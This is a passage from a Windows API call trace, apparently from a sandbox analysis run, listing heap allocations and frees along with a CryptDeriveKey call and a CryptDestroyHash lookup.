(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43ca760 [0076.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca760, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.829] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac700) returned 1 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.831] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0076.832] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.832] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0076.832] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0076.832] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0076.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.833] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0076.833] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0076.834] CryptDestroyHash (hHash=0x41ac600) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.835] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0076.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 